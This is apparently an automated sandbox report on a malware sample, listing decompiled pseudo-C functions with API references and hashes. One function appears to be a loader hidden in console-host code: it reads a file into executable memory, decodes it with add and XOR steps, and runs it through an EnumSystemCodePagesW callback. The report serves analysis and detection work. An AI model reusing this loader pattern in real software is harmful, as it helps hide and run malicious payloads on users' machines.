                                                                                                                          C-Code - Quality: 58%
                                                                                                                          			E0041E1BB(intOrPtr __eax, void* __ebx, void* __edi, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t11;

				asm("int1");
				asm("out dx, al");
				asm("fidiv word [eax-0x6e417f76]");
				 *0x8bec8b55 = __eax;
				_t8 = _a4;
				_t3 = _t8 + 0xc98; // 0xc98
				E0041EB27( *((intOrPtr*)(_a4 + 0x14)), _t8, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x35);
				_t11 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t11;
			}




                                                                                                                          0x0041e1bd
                                                                                                                          0x0041e1be
                                                                                                                          0x0041e1c0
                                                                                                                          0x0041e1c6
                                                                                                                          0x0041e1ca
                                                                                                                          0x0041e1d6
                                                                                                                          0x0041e1de
                                                                                                                          0x0041e1f4
                                                                                                                          0x0041e1f8

                                                                                                                          APIs
                                                                                                                          • RtlFreeHeap.NTDLL(00000060,00000005,00000000,00000000,00000005,00000060,00000000,00000000,?,?,00000000,00000206,?), ref: 0041E1F4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.415905710.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_400000_jaxdij.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeHeap
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3298025750-0
                                                                                                                          • Opcode ID: 6ed0ec2f31969b72c74a27bf184960ff98628f9d2234504d3493bdbdac74f2ca
                                                                                                                          • Instruction ID: 7412cbc17b894610e7664dca0321881149e37b6b0f584cdc3f2228deaf9284e9
                                                                                                                          • Opcode Fuzzy Hash: 6ed0ec2f31969b72c74a27bf184960ff98628f9d2234504d3493bdbdac74f2ca
                                                                                                                          • Instruction Fuzzy Hash: 3CE0DFBC1182C54FDB10FF6AE8C18A73BD5EF82308700A65AE89587617D230E4A5CB72
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0041E1C7 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E0041E1C7(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;

				_t3 = _a4 + 0xc98; // 0xc98
				E0041EB27( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                                                                                          0x0041e1d6
                                                                                                                          0x0041e1de
                                                                                                                          0x0041e1f4
                                                                                                                          0x0041e1f8

                                                                                                                          APIs
                                                                                                                          • RtlFreeHeap.NTDLL(00000060,00000005,00000000,00000000,00000005,00000060,00000000,00000000,?,?,00000000,00000206,?), ref: 0041E1F4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.415905710.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_400000_jaxdij.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeHeap
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3298025750-0
                                                                                                                          • Opcode ID: 7383604f3fe5c795b9236c36b71377a732ea8f0b598dae172b24566b996ec6fa
                                                                                                                          • Instruction ID: ff71e45145ce3c742298049d26a32dfca4dc9eab044cbc71735d9f34edea979b
                                                                                                                          • Opcode Fuzzy Hash: 7383604f3fe5c795b9236c36b71377a732ea8f0b598dae172b24566b996ec6fa
                                                                                                                          • Instruction Fuzzy Hash: 95E046B5200218ABDB14EF8ADC49EE737ACEF88754F018159FE095B242CA30F914CBB4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0041E187 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E0041E187(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;

				E0041EB27( *((intOrPtr*)(_a4 + 0x14)), _a4, _t7 + 0xc94,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                                                                                          0x0041e19e
                                                                                                                          0x0041e1b4
                                                                                                                          0x0041e1b8

                                                                                                                          APIs
                                                                                                                          • RtlAllocateHeap.NTDLL(0041812D,?,004188D4,004188D4,?,0041812D,?,?,?,?,?,00000000,00000005,00000206), ref: 0041E1B4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.415905710.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_400000_jaxdij.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateHeap
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1279760036-0
                                                                                                                          • Opcode ID: 71d30878ffc0fd6371cee718eb9878eb3463dfa7e001799ef66c66478ee65a27
                                                                                                                          • Instruction ID: 1388dd934f0a4cc284384f94e8c5a8998a3c4ae718bb400ef2b18055324356cd
                                                                                                                          • Opcode Fuzzy Hash: 71d30878ffc0fd6371cee718eb9878eb3463dfa7e001799ef66c66478ee65a27
                                                                                                                          • Instruction Fuzzy Hash: 95E046B5200218ABDB18EF9ADC45EE737ACEF88754F018159FE095B242C630F910CBB4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0041E327 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E0041E327(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;

				E0041EB27( *((intOrPtr*)(_a4 + 0xa1c)), _a4, _t7 + 0xcb0,  *((intOrPtr*)(_a4 + 0xa1c)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                                                                                          0x0041e341
                                                                                                                          0x0041e357
                                                                                                                          0x0041e35b

                                                                                                                          APIs
                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040F379,0040F379,?,00000000,?,?), ref: 0041E357
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.415905710.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_400000_jaxdij.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LookupPrivilegeValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3899507212-0
                                                                                                                          • Opcode ID: 6915fa93d7270e13bfd703e99c47af289f1ee2615e020f739a89d4d612532f61
                                                                                                                          • Instruction ID: c45f07e038ebfe2a057fbf399f056a184573bb7e02c84091132a971eb32c72bf
                                                                                                                          • Opcode Fuzzy Hash: 6915fa93d7270e13bfd703e99c47af289f1ee2615e020f739a89d4d612532f61
                                                                                                                          • Instruction Fuzzy Hash: DBE01AB52002186BD710DF49DC45EE737ADAF88654F118159BE0957242C630F810CAB5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0040F527 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 37%
                                                                                                                          			E0040F527(intOrPtr _a4) {
				intOrPtr* _t7;
				void* _t8;

				_t7 = E00418A77(_a4 + 0x20,  *((intOrPtr*)(_a4 + 0xbc4)), 0, 0, 0x998e91b2);
				if(_t7 != 0) {
					_t8 =  *_t7(0x10); // executed
					return 0 | _t8 == 0x000000f1;
				} else {
					return _t7;
				}
			}





                                                                                                                          0x0040f541
                                                                                                                          0x0040f54b
                                                                                                                          0x0040f551
                                                                                                                          0x0040f560
                                                                                                                          0x0040f54e
                                                                                                                          0x0040f54e
                                                                                                                          0x0040f54e

                                                                                                                          APIs
                                                                                                                          • GetUserGeoID.KERNELBASE(00000010), ref: 0040F551
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.415905710.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_400000_jaxdij.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: User
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 765557111-0
                                                                                                                          • Opcode ID: 40bf48d4fd6e03cba57d132749fc158fbbb21c364b99c8ef44d233898b217c90
                                                                                                                          • Instruction ID: 3a1d2ef0c60c757c0f72a0a3003fad6eb55e58fc730c6d937a84e79b7af20ed7
                                                                                                                          • Opcode Fuzzy Hash: 40bf48d4fd6e03cba57d132749fc158fbbb21c364b99c8ef44d233898b217c90
                                                                                                                          • Instruction Fuzzy Hash: 1FE0C23338030427F62095A98C42FB6328E5B84B04F048475F908E72C1D5A9E5805014
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0041E207 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E0041E207(intOrPtr _a4, int _a8) {

				_t5 = _a4;
				E0041EB27( *((intOrPtr*)(_a4 + 0xa18)), _t5, _t5 + 0xca0,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x36);
				ExitProcess(_a8);
			}



                                                                                                                          0x0041e20a
                                                                                                                          0x0041e221
                                                                                                                          0x0041e22f

                                                                                                                          APIs
                                                                                                                          • ExitProcess.KERNEL32(?,00000000,0000005E,?,?,00000001), ref: 0041E22F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.415905710.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_400000_jaxdij.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ExitProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 621844428-0
                                                                                                                          • Opcode ID: 0c6232b6cdbf6635767260dc15682acedaa1cab9f782f361699728f7b20cdda3
                                                                                                                          • Instruction ID: 13d1b6daedaff665116823a2b2046991a6a8e25442adef1dbb486679b8e7ea51
                                                                                                                          • Opcode Fuzzy Hash: 0c6232b6cdbf6635767260dc15682acedaa1cab9f782f361699728f7b20cdda3
                                                                                                                          • Instruction Fuzzy Hash: 5CD0C2312002187BC620DF89CC45FD3379CDF44794F004065BA0C5B242C530BA00C7E0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0041E201 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 58%
                                                                                                                          			E0041E201(intOrPtr _a4, int _a8) {

				0x552e();
				_t5 = _a4;
				E0041EB27( *((intOrPtr*)(_a4 + 0xa18)), _t5, _t5 + 0xca0,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x36);
				ExitProcess(_a8);
			}



                                                                                                                          0x0041e201
                                                                                                                          0x0041e20a
                                                                                                                          0x0041e221
                                                                                                                          0x0041e22f

                                                                                                                          APIs
                                                                                                                          • ExitProcess.KERNEL32(?,00000000,0000005E,?,?,00000001), ref: 0041E22F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.415905710.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_400000_jaxdij.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ExitProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 621844428-0
                                                                                                                          • Opcode ID: 5eec4a9f527b46d2e29ff6fd13732969449359128746dec24f7507a679fe105e
                                                                                                                          • Instruction ID: 5bdf52f2e0ec2a1ea7af0f03d3d57e3e5df00fcbd292db30dfcfeb4ee8aeeaf0
                                                                                                                          • Opcode Fuzzy Hash: 5eec4a9f527b46d2e29ff6fd13732969449359128746dec24f7507a679fe105e
                                                                                                                          • Instruction Fuzzy Hash: CAD0C2742002047BC620EF55CC85FD737A89F45344F14805479082B242C530BA00C7D0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Non-executed Functions

                                                                                                                          Function 0024C500 Relevance: 74.0, APIs: 24, Strings: 18, Instructions: 467registrystringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • wsprintfW.USER32 ref: 0024C5B3
                                                                                                                          • RegSetValueExW.ADVAPI32 ref: 0024C5FF
                                                                                                                          • RegSetValueExW.ADVAPI32 ref: 0024C67D
                                                                                                                          • RegSetValueExW.ADVAPI32 ref: 0024C6E2
                                                                                                                            • Part of subcall function 002433B0: GetDpiForSystem.USER32 ref: 0024341C
                                                                                                                            • Part of subcall function 002433B0: MulDiv.KERNEL32 ref: 00243435
                                                                                                                            • Part of subcall function 002433B0: GetDpiForSystem.USER32 ref: 00243446
                                                                                                                            • Part of subcall function 002433B0: MulDiv.KERNEL32 ref: 0024345F
                                                                                                                          • RegSetValueExW.ADVAPI32 ref: 0024C74A
                                                                                                                          • lstrcmpW.KERNEL32 ref: 0024C778
                                                                                                                          • lstrlenW.KERNEL32 ref: 0024C795
                                                                                                                          • RegSetValueExW.ADVAPI32 ref: 0024C7D7
                                                                                                                          • RegSetValueExW.ADVAPI32 ref: 0024C83F
                                                                                                                          • GetDpiForSystem.USER32 ref: 0024C876
                                                                                                                          • MulDiv.KERNEL32 ref: 0024C891
                                                                                                                          • GetDpiForSystem.USER32 ref: 0024C8A0
                                                                                                                          • MulDiv.KERNEL32 ref: 0024C8BB
                                                                                                                          • RegSetValueExW.ADVAPI32 ref: 0024C926
                                                                                                                          • RegSetValueExW.ADVAPI32 ref: 0024C98E
                                                                                                                          • RegSetValueExW.ADVAPI32 ref: 0024C9F0
                                                                                                                          • RegSetValueExW.ADVAPI32 ref: 0024CA52
                                                                                                                          • RegSetValueExW.ADVAPI32 ref: 0024CAB4
                                                                                                                          • RegSetValueExW.ADVAPI32 ref: 0024CB16
                                                                                                                          • RegSetValueExW.ADVAPI32 ref: 0024CB78
                                                                                                                          • RegSetValueExW.ADVAPI32 ref: 0024CBDA
                                                                                                                          • RegSetValueExW.ADVAPI32 ref: 0024CC67
                                                                                                                          • RegSetValueExW.ADVAPI32 ref: 0024CCCC
                                                                                                                          • RegSetValueExW.ADVAPI32 ref: 0024CD59
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.415826902.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.415812138.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415862410.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415879314.0000000000264000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415891991.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Value$System$lstrcmplstrlenwsprintf
                                                                                                                          • String ID: ColorTable%02d$CursorSize$CursorVisible$EditionMode$FaceName$FontPitchFamily$FontSize$FontWeight$HistoryBufferSize$HistoryNoDup$InsertMode$MenuMask$PopupColors$QuickEdit$ScreenBufferSize$ScreenColors$WindowSize$`
                                                                                                                          • API String ID: 4202061470-2238697219
                                                                                                                          • Opcode ID: f508cf05dfd11a099b1546d500713d0497421c0ce19d5adeedc8d972eed08d75
                                                                                                                          • Instruction ID: b798a4bf41488a6502ff5d493ddca8e9f413d06ece2acd4b14075b4a4e4cf8a4
                                                                                                                          • Opcode Fuzzy Hash: f508cf05dfd11a099b1546d500713d0497421c0ce19d5adeedc8d972eed08d75
                                                                                                                          • Instruction Fuzzy Hash: 5132E4B090430ADFCB54DF58D488B9EBBF0FB48314F10C96AE9599B250D774AA98CF91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 002418D0 Relevance: 33.7, APIs: 10, Strings: 9, Instructions: 461filememoryCOMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 17%
                                                                                                                          			E002418D0(void* __eflags, void* _a4, void* _a8, WCHAR* _a12, void* _a16) {
				struct _OVERLAPPED* _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				struct _OVERLAPPED* _v32;
				signed short* _v36;
				void* _v40;
				void* _v44;
				long _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				struct _OVERLAPPED* _v64;
				signed int _v68;
				long _v72;
				struct _OVERLAPPED* _v76;
				signed short _v96;
				signed int _v100;
				signed int _v132;
				char _v144;
				signed int _v148;
				void* _v152;
				void* _v156;
				void* _v160;
				void* _v164;
				signed int _v168;
				signed int _v172;
				long _v176;
				void* __edi;
				int _t277;
				signed int _t278;
				signed int _t279;
				signed int _t282;
				signed int _t284;
				signed int _t287;
				void* _t299;
				void* _t300;
				signed int _t304;
				signed int _t307;
				signed int _t310;
				signed int _t313;
				signed int _t316;
				signed int _t319;
				signed int _t322;
				signed int _t324;
				signed int _t332;
				signed int _t338;
				signed int _t345;
				intOrPtr _t374;
				void* _t431;
				void* _t434;
				void* _t438;
				signed int* _t439;
				signed int* _t440;
				intOrPtr* _t441;
				signed int* _t442;
				intOrPtr* _t443;
				signed int* _t444;
				intOrPtr* _t446;

				_v16 = 0;
				_v20 = 0;
				_v24 = 0;
				_v28 = 0;
				_v32 = 0;
				_v52 = 2;
				_v64 = 0;
				_v68 = 0;
				_v76 = 0;
				_v176 = 0x3d0900;
				_v76 = E00251011();
				if(_v76 != 0) {
					E0024FC70(_t431, _v76, 0x54, 0x3d0900);
					_v44 = CreateFileW(_a12, 0x80000000, 1, 0, 3, 0x80, 0);
					_v48 = GetFileSize(_v44, 0);
					_v40 = VirtualAlloc(0, _v48, 0x3000, 0x40);
					__eflags = 0;
					ReadFile(_v44, _v40, _v48,  &_v72, 0);
					_t438 = _t434 - 0xfffffffffffffff0;
					while(1) {
						 *(_v40 + _v68) =  *(_v40 + _v68) - 0x3a;
						 *(_v40 + _v68) =  *(_v40 + _v68) + 1;
						 *(_v40 + _v68) =  *(_v40 + _v68) + 1;
						 *(_v40 + _v68) =  *(_v40 + _v68) + 0xff;
						 *(_v40 + _v68) =  *(_v40 + _v68) + 1;
						 *(_v40 + _v68) =  *(_v40 + _v68) + 0xff;
						 *(_v40 + _v68) =  *(_v40 + _v68) + 1;
						 *(_v40 + _v68) =  *(_v40 + _v68) ^ 0x00000065;
						 *(_v40 + _v68) =  *(_v40 + _v68) ^ 0x000000b5;
						 *(_v40 + _v68) =  *(_v40 + _v68) + 1;
						 *(_v40 + _v68) =  *(_v40 + _v68) ^ 0x00000026;
						 *(_v40 + _v68) =  *(_v40 + _v68) ^ 0x000000cd;
						 *(_v40 + _v68) =  *(_v40 + _v68) - 0x9a;
						 *(_v40 + _v68) =  *(_v40 + _v68) + 0x34;
						_v68 = _v68 + 1;
						__eflags = _v68 - _v48;
						if(_v68 >= _v48) {
							break;
						}
					}
					__eflags = 0;
					_v176 = _v40;
					_v172 = 0;
					EnumSystemCodePagesW(??, ??);
					_t439 = _t438 - 8;
					 *_t439 = _v76;
					E00250F8D();
					_v68 = 0;
					while(1) {
						__eflags = _v68 - _v52;
						if(_v68 >= _v52) {
							break;
						}
						 *0x264918 = 0x1f7;
						_v68 = _v68 + 1;
					}
					_t277 = GetOEMCP();
					 *0x2649b8 = _t277;
					 *0x2649b4 = _t277;
					 *0x2649a4 = 0x32;
					_t278 =  *0x2649a4; // 0x0
					 *_t439 = _t278;
					_v176 = 4;
					_t279 = E00250F82();
					 *0x2649a0 = _t279;
					__eflags = _t279;
					if(_t279 != 0) {
						_v68 = 1;
						while(1) {
							__eflags = _v68 - _v52;
							if(_v68 >= _v52) {
								break;
							}
							 *_t439 =  *(_v56 + _v68 * 2) & 0x0000ffff;
							_v176 = L"--headless";
							_t307 = E002511F7();
							__eflags = _t307;
							if(_t307 != 0) {
								 *_t439 =  *(_v56 + _v68 * 2) & 0x0000ffff;
								_v176 = L"--unix";
								_t310 = E002511F7();
								__eflags = _t310;
								if(_t310 != 0) {
									 *_t439 =  *(_v56 + _v68 * 2) & 0x0000ffff;
									_v176 = L"--width";
									_t313 = E002511F7();
									__eflags = _t313;
									if(_t313 != 0) {
										 *_t439 =  *(_v56 + _v68 * 2) & 0x0000ffff;
										_v176 = L"--height";
										_t316 = E002511F7();
										__eflags = _t316;
										if(_t316 != 0) {
											 *_t439 =  *(_v56 + _v68 * 2) & 0x0000ffff;
											_v176 = L"--signal";
											_t319 = E002511F7();
											__eflags = _t319;
											if(_t319 != 0) {
												 *_t439 =  *(_v56 + _v68 * 2) & 0x0000ffff;
												_v176 = L"--server";
												_t322 = E002511F7();
												__eflags = _t322;
												if(_t322 != 0) {
													_v16 = 1;
												} else {
													_t324 = _v68 + 1;
													_v68 = _t324;
													__eflags = _t324 - _v52;
													if(_t324 != _v52) {
														 *_t439 =  *(_v56 + _v68 * 2) & 0x0000ffff;
														_v176 =  &_v36;
														_v172 = 0;
														 *0x264914 = E00251381();
														__eflags =  *_v36;
														if( *_v36 == 0) {
															goto L47;
														} else {
															_v16 = 1;
														}
													} else {
														_v16 = 1;
													}
												}
											} else {
												_t332 = _v68 + 1;
												_v68 = _t332;
												__eflags = _t332 - _v52;
												if(_t332 != _v52) {
													 *_t439 =  *(_v56 + _v68 * 2) & 0x0000ffff;
													_v176 =  &_v36;
													_v172 = 0;
													_v32 = E00251381();
													__eflags =  *_v36;
													if( *_v36 == 0) {
														goto L47;
													} else {
														_v16 = 1;
													}
												} else {
													_v16 = 1;
												}
											}
										} else {
											_t338 = _v68 + 1;
											_v68 = _t338;
											__eflags = _t338 - _v52;
											if(_t338 != _v52) {
												 *_t439 =  *(_v56 + _v68 * 2) & 0x0000ffff;
												_v176 =  &_v36;
												_v172 = 0;
												_v28 = E00251381();
												__eflags = _v28;
												if(_v28 != 0) {
													L30:
													__eflags = _v28 - 0xffff;
													if(_v28 > 0xffff) {
														goto L32;
													} else {
														__eflags =  *_v36 & 0x0000ffff;
														if(( *_v36 & 0x0000ffff) == 0) {
															goto L47;
														} else {
															goto L32;
														}
													}
												} else {
													__eflags =  *0x264920;
													if( *0x264920 == 0) {
														L32:
														_v16 = 1;
													} else {
														goto L30;
													}
												}
											} else {
												_v16 = 1;
											}
										}
									} else {
										_t345 = _v68 + 1;
										_v68 = _t345;
										__eflags = _t345 - _v52;
										if(_t345 != _v52) {
											 *_t439 =  *(_v56 + _v68 * 2) & 0x0000ffff;
											_v176 =  &_v36;
											_v172 = 0;
											_v24 = E00251381();
											__eflags = _v24;
											if(_v24 != 0) {
												L21:
												__eflags = _v24 - 0xffff;
												if(_v24 > 0xffff) {
													goto L23;
												} else {
													__eflags =  *_v36 & 0x0000ffff;
													if(( *_v36 & 0x0000ffff) == 0) {
														goto L47;
													} else {
														goto L23;
													}
												}
											} else {
												__eflags =  *0x264920;
												if( *0x264920 == 0) {
													L23:
													_v16 = 1;
												} else {
													goto L21;
												}
											}
										} else {
											_v16 = 1;
										}
									}
								} else {
									 *0x264920 = 1;
									 *0x264924 = 1;
									_v20 = 1;
									goto L47;
								}
							} else {
								_v20 = 1;
								L47:
								_v68 = _v68 + 1;
								continue;
							}
							goto L72;
						}
						__eflags =  *0x264914;
						if( *0x264914 != 0) {
							__eflags = _v24;
							if(_v24 == 0) {
								_v24 = 0x50;
							}
							__eflags = _v28;
							if(__eflags == 0) {
								_v28 = 0x96;
							}
							 *_t439 = 0x264914;
							_v176 = 1;
							_v172 = _v24;
							_v168 = _v28;
							_t282 = E002420C0(__eflags);
							_t440 = _t439 - 0x10;
							 *0x26491c = _t282;
							__eflags = _t282;
							if(_t282 != 0) {
								__eflags = _v20;
								if(_v20 == 0) {
									 *_t440 = 0x264914;
									_t284 = E00242420(0);
									_t441 = _t440 - 4;
									__eflags = _t284;
									if(_t284 != 0) {
										 *_t441 =  &_v144;
										GetStartupInfoW(??);
										_t442 = _t441 - 4;
										 *_t442 = _v132;
										_t287 = E00251259();
										 *_t442 = 0x264914;
										_v176 = _v132;
										_v172 = _t287 << 1;
										E00242790();
										_t443 = _t442 - 0xc;
										__eflags = _v100 & 0x00000001;
										if((_v100 & 0x00000001) == 0) {
											_v148 = 5;
										} else {
											_v148 = _v96 & 0x0000ffff;
										}
										_t374 =  *0x2649bc; // 0x0
										 *_t443 = _t374;
										_v176 = _v148;
										ShowWindow(??, ??);
										_t444 = _t443 - 8;
										goto L71;
									} else {
										_v16 = 1;
									}
								} else {
									 *_t440 = 0xfffffff6;
									_t299 = GetStdHandle(??);
									_t446 = _t440 - 4;
									 *0x2649c4 = _t299;
									 *_t446 = 0xfffffff5;
									_t300 = GetStdHandle(??);
									_t444 = _t446 - 4;
									 *0x2649c8 = _t300;
									__eflags =  *0x2649c4;
									if( *0x2649c4 != 0) {
										L59:
										 *_t444 = 0x264914;
										E002422F0();
										_t444 = _t444 - 4;
										__eflags =  *0x264920;
										if( *0x264920 != 0) {
											L62:
											goto L64;
										} else {
											 *_t444 = 0x264914;
											_t304 = E00242380();
											_t444 = _t444 - 4;
											__eflags = _t304;
											if(_t304 != 0) {
												goto L62;
											} else {
												_v16 = 1;
											}
										}
									} else {
										__eflags =  *0x2649c8;
										if( *0x2649c8 == 0) {
											 *0x264928 = 1;
											L64:
											L71:
											 *_t444 = 0x264914;
											_v176 = _v32;
											_v16 = E002429C0();
										} else {
											goto L59;
										}
									}
								}
							} else {
								_v16 = 1;
							}
						} else {
							_v16 = 1;
						}
					} else {
						_v16 = 1;
					}
				} else {
					_v16 = 0;
				}
				L72:
				return _v16;
			}





























































                                                                                                                          0x002418e7
                                                                                                                          0x002418ee
                                                                                                                          0x002418f5
                                                                                                                          0x002418fc
                                                                                                                          0x00241903
                                                                                                                          0x0024190a
                                                                                                                          0x00241911
                                                                                                                          0x00241918
                                                                                                                          0x0024191f
                                                                                                                          0x00241926
                                                                                                                          0x00241932
                                                                                                                          0x00241939
                                                                                                                          0x00241961
                                                                                                                          0x002419a7
                                                                                                                          0x002419c3
                                                                                                                          0x002419ef
                                                                                                                          0x002419fe
                                                                                                                          0x00241a17
                                                                                                                          0x00241a1d
                                                                                                                          0x00241a20
                                                                                                                          0x00241a2d
                                                                                                                          0x00241a3c
                                                                                                                          0x00241a4b
                                                                                                                          0x00241a5a
                                                                                                                          0x00241a69
                                                                                                                          0x00241a78
                                                                                                                          0x00241a87
                                                                                                                          0x00241a97
                                                                                                                          0x00241aaa
                                                                                                                          0x00241ab9
                                                                                                                          0x00241ac9
                                                                                                                          0x00241adc
                                                                                                                          0x00241aef
                                                                                                                          0x00241aff
                                                                                                                          0x00241b08
                                                                                                                          0x00241b0e
                                                                                                                          0x00241b11
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00241b17
                                                                                                                          0x00241b1f
                                                                                                                          0x00241b21
                                                                                                                          0x00241b24
                                                                                                                          0x00241b2c
                                                                                                                          0x00241b32
                                                                                                                          0x00241b38
                                                                                                                          0x00241b3b
                                                                                                                          0x00241b40
                                                                                                                          0x00241b47
                                                                                                                          0x00241b4a
                                                                                                                          0x00241b4d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00241b53
                                                                                                                          0x00241b63
                                                                                                                          0x00241b63
                                                                                                                          0x00241b6b
                                                                                                                          0x00241b71
                                                                                                                          0x00241b76
                                                                                                                          0x00241b7b
                                                                                                                          0x00241b85
                                                                                                                          0x00241b8a
                                                                                                                          0x00241b8d
                                                                                                                          0x00241b95
                                                                                                                          0x00241b9a
                                                                                                                          0x00241b9f
                                                                                                                          0x00241ba2
                                                                                                                          0x00241bb4
                                                                                                                          0x00241bbb
                                                                                                                          0x00241bbe
                                                                                                                          0x00241bc1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00241bd7
                                                                                                                          0x00241bda
                                                                                                                          0x00241bde
                                                                                                                          0x00241be3
                                                                                                                          0x00241be6
                                                                                                                          0x00241c08
                                                                                                                          0x00241c0b
                                                                                                                          0x00241c0f
                                                                                                                          0x00241c14
                                                                                                                          0x00241c17
                                                                                                                          0x00241c4d
                                                                                                                          0x00241c50
                                                                                                                          0x00241c54
                                                                                                                          0x00241c59
                                                                                                                          0x00241c5c
                                                                                                                          0x00241cfa
                                                                                                                          0x00241cfd
                                                                                                                          0x00241d01
                                                                                                                          0x00241d06
                                                                                                                          0x00241d09
                                                                                                                          0x00241da7
                                                                                                                          0x00241daa
                                                                                                                          0x00241dae
                                                                                                                          0x00241db3
